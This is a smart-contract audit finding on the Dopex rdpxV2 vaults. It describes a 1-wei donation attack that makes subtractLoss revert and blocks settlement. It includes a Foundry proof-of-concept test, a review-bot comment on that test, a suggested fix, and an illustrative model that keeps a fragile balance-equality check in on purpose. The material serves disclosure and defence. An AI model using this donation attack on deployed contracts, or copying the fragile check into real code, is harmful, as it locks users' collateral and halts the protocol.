Lines of code
<https://github.com/code-423n4/2023-08-dopex/blob/eb4d4a201b3a75dd4bddc74a34e9c42c71d0d12f/contracts/perp-vault/PerpetualAtlanticVault.sol#L359-L361>
<https://github.com/code-423n4/2023-08-dopex/blob/eb4d4a201b3a75dd4bddc74a34e9c42c71d0d12f/contracts/perp-vault/PerpetualAtlanticVaultLP.sol#L199-L205>
In the settle logic, the RdpxV2Core contract calls PerpetualAtlanticVault.settle() to update funding, burn option tokens and settle tokens. However, this logic can be made to revert in the call IPerpetualAtlanticVaultLP(addresses.perpetualAtlanticVaultLP).subtractLoss(ethAmount) through a donation attack vector. An attacker could transfer only 1 wei to the PerpetualAtlanticVaultLP contract to make the logic in PerpetualAtlanticVaultLP.subtractLoss revert.
So far, the impacts could be: 1. collateral gets locked there; 2. the protocol's settling function is DoSed; 3. paying funding for PerpetualAtlanticVault is blocked.
diff --git a/tests/rdpxV2-core/Unit.t.sol b/tests/rdpxV2-core/Unit.t.sol
index e11c284..a85c296 100644
--- a/tests/rdpxV2-core/Unit.t.sol
+++ b/tests/rdpxV2-core/Unit.t.sol
@@ -333,6 +333,24 @@ contract Unit is ERC721Holder, Setup {
);
}
+ function testSettle_DoS() public {
+ rdpxV2Core.bond(5 * 1e18, 0, address(this));
+ rdpxV2Core.bond(1 * 1e18, 0, address(this));
+
+ vault.addToContractWhitelist(address(rdpxV2Core));
+ uint256[] memory _ids = new uint256[](1);
+ _ids[0] = 0;
+ rdpxPriceOracle.updateRdpxPrice(1e7);
+
+ address attacker = vm.addr(1337);
+ deal(address(weth), attacker, 1 ether);
+ vm.startPrank(attacker);
+ weth.transfer(address(vaultLp), 1);
+ vm.stopPrank();
+ vm.expectRevert("Not enough collateral was sent out");
+ rdpxV2Core.settle(_ids);
+ }
+
function testWithdraw() public {
rdpxV2Core.addToDelegate(1 * 1e18, 10e8);
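Review bot: testSettle_DoS has no control case, so the expected revert at `rdpxV2Core.settle(_ids)` is not tied to the `weth.transfer(address(vaultLp), 1)` line; the same setup (two bonds, whitelisting, price update to 1e7) is never shown settling successfully. Add a companion test that runs the identical steps without the transfer and asserts that settle succeeds, and add a comment explaining why the second `bond(1 * 1e18, ...)` call and option id 0 are needed. The `vm.startPrank`/`vm.stopPrank` pair wraps a single call and could be one `vm.prank(attacker)`.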
Foundry
Consider changing the way loss is tracked in PerpetualAtlanticVaultLP, i.e. use ERC20#transfer() to transfer tokens from PerpetualAtlanticVaultLP to the RdpxV2Core contract and then calculate the loss within the same function, instead of having PerpetualAtlanticVault call ERC20#transferFrom.
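The following is an added example, not code from the Dopex repository or from the report's author. It is a simplified model that assumes the reverting check compares the live token balance to the internal ledger with strict equality (the check itself is not shown on this page), next to a variant shaped like the mitigation above; `LossAccountingModel`, `subtractLossStrict`, `settleLoss` and `deposit` are hypothetical names.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

interface IERC20 {
    function balanceOf(address) external view returns (uint256);
    function transfer(address, uint256) external returns (bool);
    function transferFrom(address, address, uint256) external returns (bool);
}

// Simplified, hypothetical model of an LP vault's loss accounting.
// Names echo the report; bodies are illustrative, not the Dopex source.
contract LossAccountingModel {
    IERC20 public immutable collateral;
    address public immutable perpVault; // only caller allowed to book losses
    uint256 public totalCollateral;     // internal ledger, unaffected by raw transfers

    constructor(IERC20 _collateral, address _perpVault) {
        collateral = _collateral;
        perpVault = _perpVault;
    }

    modifier onlyPerpVault() {
        require(msg.sender == perpVault, "Only perp vault");
        _;
    }

    function deposit(uint256 amount) external {
        require(collateral.transferFrom(msg.sender, address(this), amount), "Transfer failed");
        totalCollateral += amount;
    }

    // Fragile (assumed shape): strict equality between live balance and ledger.
    // An unsolicited 1 wei transfer leaves balanceOf() above the ledger forever.
    function subtractLossStrict(uint256 loss) external onlyPerpVault {
        require(
            collateral.balanceOf(address(this)) == totalCollateral - loss,
            "Not enough collateral was sent out"
        );
        totalCollateral -= loss;
    }

    // Mitigation shape: push the tokens and update the ledger in the same call,
    // so the outcome never depends on balanceOf() and donations cannot block it.
    function settleLoss(address to, uint256 loss) external onlyPerpVault {
        require(loss <= totalCollateral, "Loss exceeds collateral");
        totalCollateral -= loss;
        require(collateral.transfer(to, loss), "Transfer failed");
    }
}
```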
DoS